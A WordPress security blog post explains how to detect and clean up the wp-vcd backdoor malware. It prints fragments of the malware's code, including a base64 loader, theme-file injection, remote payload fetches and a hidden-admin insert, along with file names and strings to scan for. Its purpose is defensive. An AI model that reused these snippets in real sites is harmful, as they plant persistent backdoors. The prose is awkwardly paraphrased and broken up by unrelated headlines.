How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

Last Updated: 12th September, 2019

A few days back our own website experienced this wp-vcd.php Malware Attack, all of a sudden. We instantly took steps to resolve the issue with appropriate actions. We consulted with our hosting provider and later we secured our website from the wp-vcd.php Malware Attack with the help of free versions of Wordfence Security – Firewall & Malware Scan Plugin and Anti-Malware Security and Brute-Force Firewall Plugin and imposed some more security strategies.

Therefore, please don’t implement, change or delete any files without reading the full article. As we request you SHOULD NOT use each and every Security Plugins unless you know what you are doing. Finally, remember to always take a backup before whatever you do. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” Guide.


End To End Security and Artificial Intelligence (AI): Microsoft Ignite 2019, A Recap

Table of Contents:-


Five 2021 Cyber-Threats To Watch Out In Cybersecurity Landscape

1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

As of late, we observed another new sort of malware infecting the WordPress websites by utilizing flaws in obsolete themes and plugins. The wp-vcd malware makes a backdoor access to your website by including hidden WordPress administrator users. Further, a few variations of the malicious codes have been believed to alter the core WordPress files and furthermore include new files in the installations /wp-includes directory.

  • The wp-vcd malware makes Spam URLs on the website (additionally alluded to as URL Injection).
  • The malware makes a backdoor passageway which enables hackers to access your website for longer periods.
  • Hackers can misuse the vulnerabilities in WordPress themes and plugins by uploading or transferring the wp-vcd malware on exposed websites.

Such a hack can be easily avoided by maintaining a strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck and customary malware scanning. It is additionally fundamental to check any modification of WordPress core files, themes and plugins.


Ultimate WordPress Security Guide 2021 (Stay Secure Online)

2: The top reasons that are responsible for the wp-vcd Malware Hack.

  • The most wide recognized reason of the hack was the utilization of a nulled theme in which the wp-vcd malware as a rule comes pre-hooked with each downloaded theme from any nulled theme websites.
  • If you are still utilizing obsolete WordPress themes and plugins on your website.
  • If NO Web Application Firewall (WAF) introduced to shield hacking efforts made by hackers.

Google Fixes Critical PNG Security Bug, Though Billions of Android Users Still Vulnerable

3: What are the Signs and Symptoms of wp-vcd Malware?

  • A completely New WordPress Admin user has been included out of the blue.
  • Your hosting provider might have suspended your WordPress hosting account on account of wp-vcd malware attack to secure the other different websites on the same server.
  • SEO spam, for example, Japanese search results or Pharma Hack attack in Google Search Results is another very common sign and symptom of the game. Become familiar with WordPress spam in search results and how to secure them. The following is the screen capture of Google spam indexed results:
  • wp-vcd.php Malware Attack in Google-Search Results

  • Unknown JavaScript codes in the source of your website.
  • Pages of your website are being diverted to obscure and shady websites.
  • Unknown PHP files in your installations wp-includes folder which is not found in the WordPress GitHub repository.
  • There are PHP files in your installations wp-content/uploads directory and its sub-directory folders.

Information Security Threats And Tools To Help Mitigate Vulnerabilities

4: Scrutinizing of what the wp-vcd Malware does?

Within your theme (whatever theme you are using), in the functions.php file, you might observe some codes like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code incorporates the class.theme-modules.php file which as it happens installs the wp-vcd malware into different themes already installed (regardless of enabled/disabled mode) and makes the various vindictive malicious files.

Below mentioned are the different patterns for code snippets of the malware suspicious code:

Pattern 1

ini_set('display_errors', 0);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...; ?>

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 } ; ?>


Enable Single Sign-On (SSO): Software As A Service (SaaS) Pricing Weakens Client Security

Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    else { $ping = false; }

Pattern 5

if ($ping) { $content = @file_get_contents(‘' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘/wp-includes/class.wp.php’, file_get_contents(‘')); }
if ($ping2) { $content = @file_get_contents(‘' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘'));//echo ABSPATH . ‘wp-includes/class.wp.php’; }

Pattern 6

$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100011111’, ‘100011111’, ‘\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.’, ‘100011111’, ‘[email protected]’, ‘’, ‘2010–06–07 00:00:00’, ‘’, ‘0’, ‘100010010’)”);


Security Automation: Automate A Step Ahead In Challenging Times

Pattern 7

if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’; echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; } }

Pattern 8

function wp_temp_setupx($phpCode) 
 $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setupx”);
 $handle = fopen($tmpfname, “w+”); 
 fwrite($handle, “<?php\n” . $phpCode); 
 include $tmpfname; unlink($tmpfname);
 return get_defined_vars();

Pattern 9

foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))


‘The Cyberthreat Handbook’ Published With Documented ‘Who’s Who’ Of Attackers

Pattern 10

if ( ! function_exists( 'wp_temp_setup' ) ) {
if($tmpcontent = @file_get_contents("".$path))

There may be more patterns, but we need to understand minutely and perfectly before we act on these patterns.

As we had analyzed in the before segment, this code would make another new administrator user with a name something like 100010010. The goal of this backdoor access administrator account is to ensure that the hacker can get to the website, regardless of whether you erase the malicious code – essentially, so the attackers could attack your website at a later purpose of time.


2020 Cybersecurity Predictions: Prediction Designed By People, Processes And Technology

5: How to clean up the wp-vcd Malware Infection?

Scan for the events of the underneath files/strings on your server and inspect their matters. Make sure to run a diff check of the file contents with relating files in the WordPress core GitHub repository or a plugin / theme directory. You can utilize both of the methodologies (or both) utilizing SSH (Secure Shell) or utilizing your IDE (Integrated Development Environment).

5.1: Strategy: 1 – Scan for files on the server that are typically vulnerable to get infected with the wp-vcd hack:

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (each and every theme installed on the server regardless of being dynamic or not)
  4. class.theme-modules.php
  5. class.wp.php
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. cookie.txt
  10. class.theme-modules.php (inside of your theme folder)
  11. codeX.php
  12. test.php

#HowTo: Avoid Potential Valuable Data Discovery Snags

5.2: Strategy: 2 – Scan for string design patterns those are found in infected malware files:

  1. $install_code
  2. tmpcontentx
  3. function wp_temp_setupx
  4. wp-tmp.php
  6. stripos($tmpcontent, $wp_auth_key)

How to secure WordPress and stay protected from the Backdoor Hack


How To Resolve SQLi, CSRF/XSRF, XSS, Session Hijacking With Other PHP Security Issues

6: How to secure WordPress and stay protected from the Backdoor Hack?

  1. Create a simple yet bold security strategy for your WordPress website:
    1. Clean – Diligently make sure that your website files and the database is 100% clean and malware free.
    2. Secure – Install a good Web Application Firewall (WAF) like Wordfence Security – Firewall & Malware Scan Plugin to block any-kind of re-infection attempts.
    3. Monitor –Run regular malware scans to check if any of the files/database have been altered or not.
  2. Delete any-kind of unused WordPress themes (even if those are disabled).
  3. Totally avoid Nulled themes and plugins on your website.
  4. Regularly and religiously update the WordPress core files, Plugins and themes.

Artificial Intelligence (AI) Voice Impersonation Threat

7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting any kind of infected websites with such malware isn’t in every case simple. Since, when they are actuated on a website, they will in general infect different sections of the website also by implanting the diverse kind of malicious codes.

Moreover, this specific malware likewise makes a backdoor access which permits the trouble makers to control with your website. Consequently, it is vital to make a viable security strategy which completes an exhaustive analysis of your website. Also, a while later totally expels the hack from your website. We strongly recommend that you must follow our Ultimate WordPress Security Guide, where you can find 25+ tricks and resolutions to stay secure online.

Try hard not to be selfish. Must share with all of yours WordPress users and friends.

, , , , , , , , , , , , ,
Previous Post
FTC: Romance Scams Ranking Higher In Dissipation Than Any Other Forgeries
Next Post
Website Backdoors: How To Find, Detect, Remove, Prevent Backdoors And Secure Your Website

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed


Pin It on Pinterest